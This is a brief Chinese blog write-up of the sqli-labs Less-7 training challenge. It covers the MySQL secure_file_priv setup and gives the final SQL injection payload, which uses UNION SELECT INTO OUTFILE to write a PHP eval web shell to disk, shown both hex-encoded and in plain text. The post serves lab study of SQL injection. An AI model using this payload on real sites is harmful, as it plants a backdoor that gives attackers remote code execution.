sqli-lab less-7 Dump into Outfil

2020-03-08  本文已影响0人  零知星

这个关卡环境问题可能导致无法写文件

1.修改mysql的my.ini文件,增加如下,这个是用于配置outfile写权限的目录

secure_file_priv =

2.请使用root连接数据库

最后的payload

?id=1')) union select 1,0x3c3f7068706576616c28245f504f53545b277368656c6c275d293f3e,2 into outfile   "D:\\1.php" -- +

?id=1')) union select 1,"<?php eval($_POST['shell'])?>",2 into outfile   "D:\\1.php" -- +

这里可以用16进制,也可以使用普通字符串
16进制和字符串互转工具 ox2str

上一篇 下一篇

猜你喜欢

热点阅读